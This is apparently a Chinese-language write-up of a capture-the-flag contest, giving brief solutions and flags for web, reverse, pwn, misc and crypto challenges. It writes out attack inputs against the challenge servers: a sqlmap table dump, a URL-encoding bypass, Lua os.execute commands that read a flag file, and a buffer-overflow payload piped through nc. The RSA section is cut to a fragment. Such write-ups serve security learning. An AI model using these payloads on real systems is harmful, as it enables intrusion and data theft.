0x00前言
0x01 Writeup
1.WEB
1.1 variacover
请求http://202.112.51.184:8103/?id=a[0]=240610708
得到flag
XCTF{sTr_covcderd_AND_you_kn0W?}
1.2 urldecode
请求http://202.112.51.184:8102?id=OPE%25%34%65CTF
得到flag
XCTF{UrlDeCode_oL_yOu_lol!}
1.3 SQL注入
用sqlmap注入
python sqlmap.py -u "http://202.112.51.184:8201?id=1" --dump -T "flag" -D "security"
得到flag
XCTF{ut9x2a5f8t9e6s3a4g5j}
1.4 jsjs
由于禁用右键功能,使用Firefox的Web Developer插件查看源代码
得到flag
XCTF{_O0oo0O_js_is_FUNNY!}
2.REVERSE
OpenReverse
下载文件,直接用notepade++打开,看到flag:
XCTF{5eacs6y8p1o9gitc9521}
3.PWN
3.1 getshell
参考 CSAW CTF 2016 aul (100) Writeup
在webshell中直接执行如下命令:
os.execute(“ls”)
os.execute(“cat flag”)
得到flag:
XCTF{q0Cr1iwqlW*W1m8ejiK*0z9JUa1gq@n&}
3.2 blind
执行如下python程序1
python -c 'from struct import pack as p; print "A" * 72 + p("Q", 0x40060d)' | nc 202.112.51.184 8301
得到flag:
XCTF{sQ^yeLZKBVkoZ7^zOtigV5xsepBY&bB7}
4.MISC
4.1 zip
利用Advanced ZIP Password Recovery 4.0,选择纯数字爆破得到zip解密密码为88888888,
解压压缩包的flag:
XCTF{ke&cVR3OHWHx42ZygOceozE6KIxz1Zzj}
4.2 pcap
Wireshark追踪流得:1
2
3
4
5
6
7
8GET /?q=XCTF%7BRSUJecDZ5xFp1z1X%26Nmpt%40PZSDQ%25Gbx6%7D HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.1.115/
Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-GB;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate
Host: 192.168.1.115
Connection: Keep-Alive
对参数q的值URLdecode后获得flag:
XCTF{RSUJecDZ5xFp1z1X&Nmpt@PZSDQ%Gbx6}
5.CRYPTO
5.1 Maya Cipher
百度搜索Maya numerals的编码规则如下:
得到1
2
3
4584354467b
323031385f
69735f636f
6d696e677d
每行对应16进制解码得flag:
XCTF{2018_is_coming}
5.2 RSA
1 | def egcd(a, b): |
flag:
554035859905981120888026046266284028688068004006280022208626